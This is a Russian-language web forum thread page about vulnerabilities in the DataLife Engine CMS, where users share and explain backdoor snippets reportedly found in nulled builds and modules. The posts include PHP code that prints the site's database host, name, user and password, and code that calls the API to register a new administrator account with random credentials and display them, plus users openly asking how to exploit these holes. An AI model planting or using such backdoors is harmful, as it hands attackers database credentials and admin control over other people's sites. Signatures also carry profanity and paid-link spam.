Сделать домашней|Добавить в избранное
 
 
dle.in.ua
  • ▪ Радел форума
  • Тема
  • Автор
  • Ответов |
  • Посл. ответ


3 страниц 1 2 3 Далее
 Ответить
 Обзор уязвимостей DLE (DataLife Engine), обзор актуальных уязвимостей
Опции Открыть меню
alexs
20 июля 2010 22:12
Сообщение #41


Новичок
  • 17

Репутация: --
Группа: Гости
Сообщений: 0
Регистрация: --
ICQ:--
Дядя ZloY как всегда постарался(как понел это типо бекдоры в нуллах и модулях)...
1)
require_once ENGINE_DIR.'/data/dbconfig.php';


echo "<b>dbconfig.php</b> : Host = ".DBHOST." DBName = ".DBNAME." DBUser = ".DBUSER." DBPassword: ".DBPASS."<br><br>";

2)
require_once ENGINE_DIR.'/api/api.class.php';

$user = md5(rand(0,10000));
$password = md5(rand(0,1000));
$res = $dle_api->external_register($user,$password,md5(rand(0,100000))."@mail

.ru",1);
echo $res;

echo $user;
echo "<br>";
echo $password;
З.Ы. Кто знает как юзать плиз в личку кинь... Ах да, было найдено http://getdle.com/extras/referer/xss/1.txt и http://getdle.com/extras/referer/xss/2.txt
Перейти в начало страницы
nugumanov
20 июля 2010 22:55
Сообщение #42


Новичок
  • 17

Репутация: 0
Группа: User
Сообщений: 0
Регистрация: 9.02.2009
ICQ:--
как бы первое ясен хyй)
второе просто регистрация!
на ссылках
Показать / Скрыть текст

--------------------
SECURED DLE v.1.0 - спешите узнать
Не наживайте себе врага в виде KZPROMO (C) ZLoy
RU-UA.WS
Перейти в начало страницы
DaImeR
20 июля 2010 22:57
Сообщение #43


Новичок
  • 17

Репутация: 0
Группа: User
Сообщений: 0
Регистрация: 22.01.2009
ICQ:416980738
нашел как юзать?

--------------------
На войне все средства хороши

Ищи и не сдавайся - найди и надругайся.
1 сайт 170р/сутки http://trustlink.ru/registration/103332
4 сайта 140р/сутки http://www.sape.ru/r.XxTBLDXgZo.php
Перейти в начало страницы
alexs
20 июля 2010 23:04
Сообщение #44


Новичок
  • 17

Репутация: --
Группа: Гости
Сообщений: 0
Регистрация: --
ICQ:--
Цитата: nugumanov
Not FoundThe requested URL /extras/referer/xss/2.txt was not found on this server.Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny4 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g Server at getdle.com Port 80

Это было взято до отката сайта...
Цитата: DaImeR
нашел как юзать?

Нет sad
Перейти в начало страницы
hell
21 июля 2010 04:17
Сообщение #45


Новичок
  • 17

Репутация: 1
Группа: User
Сообщений: 0
Регистрация: 4.07.2009
ICQ:--
как бы хня API с двига нах и всё

--------------------
Не ем школьников. Не вкусные ))
Перейти в начало страницы
alexs
21 июля 2010 10:06
Сообщение #46


Новичок
  • 17

Репутация: --
Группа: Гости
Сообщений: 0
Регистрация: --
ICQ:--
Цитата: hell
как бы хня API с двига нах и всё

Это про 2... но меня интересует как эту дыру заюзать))
Перейти в начало страницы
sergey_479
21 июля 2010 11:31
Сообщение #47


Новичок
  • 17

Репутация: 0
Группа: User
Сообщений: 0
Регистрация: 25.10.2009
ICQ:--
В каком файле была вторая дырка? По моему надо просто запустить файл где был тот код и сразу зарегеистрируется акк и выведутся данные. И возможно что этот код запускался через request
Перейти в начало страницы
nugumanov
21 июля 2010 17:14
Сообщение #48


Новичок
  • 17

Репутация: 0
Группа: User
Сообщений: 0
Регистрация: 9.02.2009
ICQ:--
открываем engine/api/api.class.php
смотрим функцию
function external_register($login, $password, $email, $group)
        {
            $login = $this->db->safesql( $login );
            $passwor
d = md5( md5( $password ) );
            $email = $this->db->safesql( $email );
            $group = intval( $group );
            
            $login_e
xist_arr = $this->load_table(USERPREFIX."_users", "count(user_id) as count", "name = '$login'");
            if( $login_exist_arr['count'] > 0 ) return -1;
            
            $email_e
xist_arr = $this->load_table(USERPREFIX."_users", "count(user_id) as count", "email = '$email'");
            if( $email_exist_arr['count'] > 0 ) return -2;
            
            if (!ereg( '^[-!#$%&\'*+\\./0-9=?A-Z^_`a-z{|}~]+'
; . '@' . '[-!#$%&\'*+\\/0-9=?A-Z^_`a-z{|}~]+\.&
#39; . '[-!#$%&\'*+\\./0-9=?A-Z^_`a-z{|}~]+$'
;, $email ) or (empty( $email )))
            {
             &n
bsp;  return -3;
            }
            
            if($
this->checkGroup($group) === false) return -4;
            
            $now = time();
            $q = $this->db->query( "insert into " . USERPREFIX . "_users (email, password, name, user_group, reg_date) VALUES ('$email', '$password', '$login', '$group', '$now')" );
            return 1;
        }

отсюда выясняем что регистрируется новый админ, логин и пароль выводится на страничке, непонятно откуда взятой

$res = $dle_api->external_register($user,$password,md5(rand(0,100000))."@mail.ru",1);
где 1 - это админ

кому я помог, киньте описание, с какого модуля и с каких файлов были взяты бекдоры?

--------------------
SECURED DLE v.1.0 - спешите узнать
Не наживайте себе врага в виде KZPROMO (C) ZLoy
RU-UA.WS
Перейти в начало страницы
alexs
21 июля 2010 17:52
Сообщение #49


Новичок
  • 17

Репутация: --
Группа: Гости
Сообщений: 0
Регистрация: --
ICQ:--
nugumanov, это 2, а 1 это ./engine/data/dbconfig.php выводится логин, пасс и хост базы данных.
Перейти в начало страницы
3 страниц 1 2 3 Далее
 Быстрый ответ Ответить

 
Текстовая версия
 Сейчас: 18 мая 2012 06:17


9.2, Auto-Speed для DLE 9.4, banana, CoolWarezPortal 9.4, dle, dle 93, et4t, Kinostar DLE 9.4, Mid[Style], psd, river, strikenight, template, Test-Templates, Vkunion, Форум, бд, бесплатно, видео вконтакте, вывод, дешево, дле, изменения, книги шаблон, магазины, модуль, модуль вопрос-ответ, новости, оффлайн, платные шаблоны, платные шаблоны dle, продажа, сайт онлайн фильмов, страница 404, топ, хак, шаблон, шаблон для dle, шаблон для дле, шаблон онлайн книг

Показать все теги
 

Только у нас
dle шаблоны бесплатные
для DataLife